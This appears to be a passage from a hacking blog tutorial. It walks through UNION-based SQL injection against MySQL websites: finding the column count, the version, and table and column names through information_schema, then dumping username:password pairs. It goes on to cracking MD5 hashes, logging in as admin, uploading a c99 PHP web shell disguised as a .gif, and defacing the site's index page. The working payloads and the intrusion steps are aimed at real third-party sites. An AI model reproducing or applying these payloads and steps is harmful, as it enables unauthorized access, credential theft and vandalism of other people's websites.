To find number of columns we use statement ORDER BY (tells database how to order the result)

so how to use it? Well just incrementing the number until we get an error. order by 1/* <-- no error order by 2/* <-- no error order by 3/* <-- no error order by 4/* <-- error (we get message like this Unknown column '4' in 'order clause' or something like that)

that means that the it has 3 columns, cause we got an error on 4.

3). Check for UNION function

With union we can select more data in one sql statement.

so we have union all select 1,2,3/* (we already found that number of columns are 3 in section 2). )

if we see some numbers on screen, i.e 1 or 2 or 3 then the UNION works :)

4). Check for MySQL version union all select 1,2,3/* NOTE: if /* not working or you get some error, then try --
it's a comment and it's important for our query to work properly.

let say that we have number 2 on the screen, now to check for version
we replace the number 2 with @@version or version() and get someting like 4.1.33-log or 5.0.45 or similar.

it should look like this union all select 1,@@version,3/*

if you get an error "union + illegal mix of collations (IMPLICIT + COERCIBLE) ..."

i didn't see any paper covering this problem, so i must write it :)

what we need is convert() function

i.e. union all select 1,convert(@@version using latin1),3/*

or with hex() and unhex()

i.e. union all select 1,unhex(hex(@@version)),3/*

and you will get MySQL version :D

5). Getting table and column name

well if the MySQL version is < 5 (i.e 4.1.33, 4.1.12...) <--- later i will describe for MySQL > 5 version.
we must guess table and column name in most cases.

common table names are: user/s, admin/s, member/s ...

common column names are: username, user, usr, user_name, password, pass, passwd, pwd etc...

i.e would be union all select 1,2,3 from admin/* (we see number 2 on the screen like before, and that's good :D)

we know that table admin exists...

now to check column names. union all select 1,username,3 from admin/* (if you get an error, then try the other column name)

we get username displayed on screen, example would be admin, or superadmin etc...

now to check if column password exists union all select 1,password,3 from admin/* (if you get an error, then try the other column name)

we seen password on the screen in hash or plain-text, it depends of how the database is set up :)

i.e md5 hash, mysql hash, sha1...

now we must complete query to look nice :)

for that we can use concat() function (it joins strings)

i.e union all select 1,concat(username,0x3a,password),3 from admin/*

Note that i put 0x3a, its hex value for : (so 0x3a is hex value for colon)

(there is another way for that, char(58), ascii value for : ) union all select 1,concat(username,char(58),password),3 from admin/*

now we get dislayed username:password on screen, i.e admin:admin or admin:somehash

when you have this, you can login like admin or some superuser :D

if can't guess the right table name, you can always try mysql.user (default)

it has user i password columns, so example would be union all select 1,concat(user,0x3a,password),3 from mysql.user/*

6). MySQL 5

Like i said before i'm gonna explain how to get table and column names
in MySQL > 5.

For this we need information_schema. It holds all tables and columns in database.

to get tables we use table_name and information_schema.tables.

i.e union all select 1,table_name,3 from information_schema.tables/*

here we replace the our number 2 with table_name to get the first table from information_schema.tables

displayed on the screen. Now we must add LIMIT to the end of query to list out all tables.

i.e union all select 1,table_name,3 from information_schema.tables limit 0,1/*

note that i put 0,1 (get 1 result starting from the 0th)

now to view the second table, we change limit 0,1 to limit 1,1

i.e union all select 1,table_name,3 from information_schema.tables limit 1,1/*

the second table is displayed.

for third table we put limit 2,1

i.e union all select 1,table_name,3 from information_schema.tables limit 2,1/*

keep incrementing until you get some useful like db_admin, poll_user, auth, auth_user etc... :D

To get the column names the method is the same.

here we use column_name and information_schema.columns

the method is same as above so example would be union all select 1,column_name,3 from information_schema.columns limit 0,1/*

the first column is diplayed.

the second one (we change limit 0,1 to limit 1,1)

ie. union all select 1,column_name,3 from information_schema.columns limit 1,1/*

the second column is displayed, so keep incrementing until you get something like

username,user,login, password, pass, passwd etc... :D

if you wanna display column names for specific table use this query. (where clause)

let's say that we found table users.

i.e union all select 1,column_name,3 from information_schema.columns where table_name='users'/*

now we get displayed column name in table users. Just using LIMIT we can list all columns in table users.

Note that this won't work if the magic quotes is ON.

let's say that we found colums user, pass and email.

now to complete query to put them all together :D

for that we use concat() , i decribe it earlier.

i.e union all select 1,concat(user,0x3a,pass,0x3a,email) from users/*

what we get here is user:pass:email from table users.


** if you are too lazy for doing above stuff you can use tools they will do all the job:
1) Exploit scanner (this will find vulnerable websites)
2) SQLi helpper (this tool will do all the injecting job and get you the pass or hash)
*** use the tools only if you are new to hacking. Do it manually thats the thrill and that is real hacking. When you do it manually you will understand the concept.

in some websites you can directly see the password. but most of the websites encrypt them using MD5. so u hav to crack the hash to get the password. to crack the password there are three ways
1) check the net whether this hash is cracked before:
2) crack the password with the help of a site:
3) use a MD5 cracking software:
Password = OwlsNest


after getting the password you can login as the admin of the site. But first you have to find the admin login page for the site. there r three methods to find the admin panel.
1) you can use an admin finder website:
2) you can use an admin finder software:

after logging in as the admin you can upload photos to the site. so now you are going to upload a shell into the site using this upload facility.

dowload the shell here(shells are php scripts which affects websites so it will be detected as trojans but no need to worry i take the responsibility):
extract it you will get a c99.php upload it.
some sites wont allow you to upload a php file. so rename it as c99.php.gif
then upload it.

after that go to (in most sites images are saved in this dir but if you cant find c99 there then you have to guess the dir)
find the c99.php.gif and click it..
now you can see a big control pannel....
now you can do what ever you want to do...
search for the index.html file and replace it with your own file. so if any one goes to that site they will see your page....

after doing this click logout.... thats it you are done...Yeye

Read More 8 Comments

Copyright © Amazing.